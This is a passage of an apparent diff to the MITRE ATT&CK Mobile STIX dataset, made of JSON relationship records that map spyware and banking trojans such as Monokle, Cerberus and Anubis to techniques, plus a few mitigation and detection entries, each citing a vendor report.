Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2021-09-20T13:59:00.498Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can be controlled via phone call from a set of \"control phones.\"(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a28a53e9-7a42-4f81-bced-0efbc3128cbd", + "type": "relationship", + "created": "2019-09-04T15:38:56.597Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. 
Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf", + "source_name": "FortiGuard-FlexiSpy" + } + ], + "modified": "2019-09-10T14:59:25.979Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) encrypts its configuration file using AES.(Citation: FortiGuard-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c720fd30-5694-42b7-bf77-d948f7ba2b6f", + "created": "2020-06-24T18:24:35.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "description": "I. Beer. (2019, August 29). Implant Teardown. 
Retrieved June 2, 2020.", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:30:27.616Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can extract the device’s keychain.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b4180067-52b6-4109-91df-52fd9a7ed2e8", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. 
Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) gathers audio from the microphone.(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f7c5c344-4310-4e2a-a5aa-133f3d132fff", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-08-09T17:59:49.021Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) can perform GPS location tracking as well as capturing coordinates as when an SMS message or call is received.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fff16b5e-49c2-45e2-8b3a-fd5f82c96dd9", + "created": "2020-04-08T15:51:25.149Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "description": "ThreatFabric. 
(2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:30:28.587Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can download the device’s contact list.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eb27258f-6bb9-49b5-928e-b66f37f8f16e", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. 
Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:24:55.047Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) requests Android Device Administrator access.(Citation: TrendMicro-XLoader)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--58c15bce-1593-4be1-ae56-7e7b2634fc56", + "created": "2020-06-26T15:32:25.045Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. 
Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:27:05.040Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can collect SMS messages from a device.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a299e0a6-cada-4629-a6c6-ed73dc4422aa", + "type": "relationship", + "created": "2020-11-24T17:55:12.903Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." 
+ } + ], + "modified": "2020-11-24T17:55:12.903Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) has base64-encoded the exfiltrated data, replacing some of the base64 characters to further obfuscate the data.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2ebd5c4c-af03-4874-a6fd-1e58d51cc055", + "created": "2020-01-27T17:05:58.310Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:28:20.439Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can collect SMS messages.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4af26643-880f-4c34-a4a8-23e89b950c9d", + "created": "2019-09-04T15:38:56.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + 
"external_references": [ + { + "source_name": "CyberMerchants-FlexiSpy", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019.", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:18:38.582Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can collect the device calendars.(Citation: CyberMerchants-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--93c20f43-6684-471c-910f-d9577f289677", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "In at least one case, [Stealth Mango](https://attack.mitre.org/software/S0328) may have been installed using physical access to the device by a repair shop.(Citation: Lookout-StealthMango)", + "modified": "2022-04-19T15:47:05.436Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8ed14c81-0b30-4bfc-8552-439aa0e920c3", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. 
Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Adups](https://attack.mitre.org/software/S0309) transmitted location information.(Citation: NYTimes-BackDoor)", + "relationship_type": "uses", + "source_ref": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c264d954-8b5f-4be1-acf0-6387b7f04fae", + "type": "relationship", + "created": "2021-02-17T20:43:52.407Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.407Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has gathered the device manufacturer, model, and serial number.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8bc21e5d-b6bb-4c93-9419-19a12061de52", + "created": "2023-01-19T18:07:52.146Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. 
(2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:19:25.438Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) can exfiltrate collected user data, including credentials and authorized cookies, via email.(Citation: trendmicro_tianyspy_0122) ", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0791f28b-d06f-4fee-9cdb-85a6fd2eed61", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-WireLurker", + "description": "Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. 
Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[WireLurker](https://attack.mitre.org/software/S0312) monitors for iOS devices connected via USB to an infected OSX computer and installs downloaded third-party applications or automatically generated malicious applications onto the device.(Citation: PaloAlto-WireLurker)", + "relationship_type": "uses", + "source_ref": "malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2cdd5474-620c-499e-8b9c-835505febc2c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. 
Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:00:45.438Z", + "description": "[Trojan-SMS.AndroidOS.OpFake.a](https://attack.mitre.org/software/S0308) uses Google Cloud Messaging (GCM) for command and control.(Citation: Kaspersky-MobileMalware)", + "relationship_type": "uses", + "source_ref": "malware--d89c132d-7752-4c7f-9372-954a71522985", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eb784dcf-4188-47e2-9217-837b262acfb9", + "created": "2022-04-01T18:43:01.860Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "An EMM/MDM can use the Android `DevicePolicyManager.setPermittedAccessibilityServices` method to set an explicit list of applications that are allowed to use Android's accessibility features.", + "modified": "2022-04-01T18:43:01.860Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c8d0d360-eb9e-4fb4-97a2-efaf6d4f1059", + "created": "2023-03-20T18:51:23.032Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": 
"2023-03-20T18:51:23.032Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--d2e112dc-f6d4-488d-b8df-ecbfb57a0a2d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--dff37d8a-b7ca-409b-b4eb-581ca3a74bb5", + "created": "2020-04-08T15:41:19.445Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Trend Micro Anubis", + "url": "https://www.trendmicro.com/en_us/research/19/a/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics.html", + "description": "K. Sun. (2019, January 17). Google Play Apps Drop Anubis, Use Motion-based Evasion. Retrieved January 20, 2021." + }, + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Anubis](https://attack.mitre.org/software/S0422) can retrieve the C2 address from Twitter and Telegram.(Citation: Cofense Anubis)(Citation: Trend Micro Anubis)", + "modified": "2022-04-20T17:57:23.327Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ced70cea-b2ac-45b8-9f7d-779eedbdf06c", + "type": "relationship", + "created": "2020-01-27T17:05:58.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. 
Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.273Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can record audio and phone calls.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--442dd700-2d7d-4cad-8282-9027e4f69133", + "created": "2022-03-30T20:31:41.927Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "New OS releases frequently contain additional limitations or controls around device location access.", + "modified": "2022-03-30T20:31:41.927Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--58c0fe4b-612d-4fc6-973f-16914b0f4b72", + "type": "relationship", + "created": "2020-11-24T17:55:12.900Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. 
Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.900Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can collect the device’s IMEI, phone number, and country.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6176a297-3097-42e2-b1c2-815e7fd8c81c", + "type": "relationship", + "created": "2020-01-21T15:29:27.041Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019." 
+ } + ], + "modified": "2020-01-21T15:29:27.041Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can download attacker-specified files.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b7cf1c31-8722-4eeb-ae59-66936c15fa87", + "type": "relationship", + "created": "2021-01-05T20:16:20.495Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.495Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can collect device photos and credentials from other applications.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--972f0703-f4d7-42d2-8ca2-bec175dac0bf", + "type": "relationship", + "created": "2020-09-11T14:54:16.617Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. 
Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.617Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can collect account information stored on the device.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--873b98de-d7cf-471b-9aa2-229eb03c9165", + "type": "relationship", + "created": "2020-09-15T15:18:12.459Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world", + "description": "O. Almkias. (2020, July 1). FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020." 
